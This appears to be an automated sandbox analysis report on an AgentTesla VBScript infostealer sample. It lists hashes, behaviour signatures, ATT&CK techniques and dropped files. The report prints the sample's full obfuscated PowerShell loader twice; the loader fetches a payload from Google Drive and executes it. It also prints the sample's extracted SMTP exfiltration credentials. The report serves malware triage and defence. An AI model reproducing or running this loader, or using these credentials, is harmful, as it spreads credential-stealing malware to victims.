agenttesla | be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32

General

Target

be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32.vbs
Size

96KB
MD5

6189a9d977994601ef954a1a146e8d8d
SHA1

93c638448ad65e7b005fa7c4527786e5462b05f2
SHA256

be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32
SHA512

21d6b94be5fdb9e65b77e22de584cbad6ec3cd751f28dc478bee1d74c686538d5ef7038d8293d3d704547df871bead4cfe4a14ee52bac59124b685040b82326d
SSDEEP

3072:7LoqFwl872xHXYxo12gEzZPQxMQuh7q+UUdwnu3:Y0wq72NMokdzZaDuhe+UAl

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	1780	powershell.exe
5	1780	powershell.exe
8	2684	msiexec.exe
10	2684	msiexec.exe
12	2684	msiexec.exe
14	2684	msiexec.exe
15	2684	msiexec.exe
17	2684	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1780	powershell.exe
2512	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org
17	api.ipify.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1780	powershell.exe
2512	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2684	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2512	powershell.exe
2684	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1780	powershell.exe
2512	powershell.exe
2512	powershell.exe
2684	msiexec.exe
2684	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2512	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2684	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2684	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 1780	2688	WScript.exe	30
PID 2688 wrote to memory of 1780	2688	WScript.exe	30
PID 2688 wrote to memory of 1780	2688	WScript.exe	30
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35
PID 2512 wrote to memory of 2684	2512	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BI37NOZNO6KZPM7OX3HE.temp

Filesize
7KB

MD5
d4fb296ffbaa9e018e7f908e350ccd7b

SHA1
a7b206cfcf2a65913d3557398296bda10f78c32f

SHA256
b63cd5527ebee41acb3905ce3c76db6ae2a2deb37b3d6ddc9e6f0498ef86a482

SHA512
59834610b91034f415bcc5526f1fa95d150e0c8debfaccc0ad9211ea609c4c85366d6255123d64ee301500121aeb75c64224dd246a0bb95835584e008c28aa9a

Download Submit
C:\Users\Admin\AppData\Roaming\Nonpunctuating.sem

Filesize
398KB

MD5
16c143ca49e7146c80dc68bbf23ae6e1

SHA1
e62e4cebad7844465b3b91a26b00e2a3ad3adc05

SHA256
a4d0b0620550854cfd0c2f78ad64372fe54c28268402e0c1c195efc9df2c8630

SHA512
c1080c102e5cacceb7e57548fe0cb9f8e121076c42a22c8ee022ca2672607d08f29bf2aa684cbba1763badfdd940955d3b47aad20ffa7b260e6f3b2473783264

Download Submit
memory/1780-7-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

Filesize
4KB

Download
memory/1780-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-10-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-11-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-14-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

Filesize
9.6MB

Download
memory/1780-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1780-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2512-18-0x00000000065A0000-0x0000000008580000-memory.dmp

Filesize
31.9MB

Download
memory/2684-40-0x0000000000200000-0x0000000001262000-memory.dmp

Filesize
16.4MB

Download
memory/2684-42-0x0000000000200000-0x0000000000240000-memory.dmp

Filesize
256KB

Download
memory/2684-41-0x0000000000200000-0x0000000001262000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing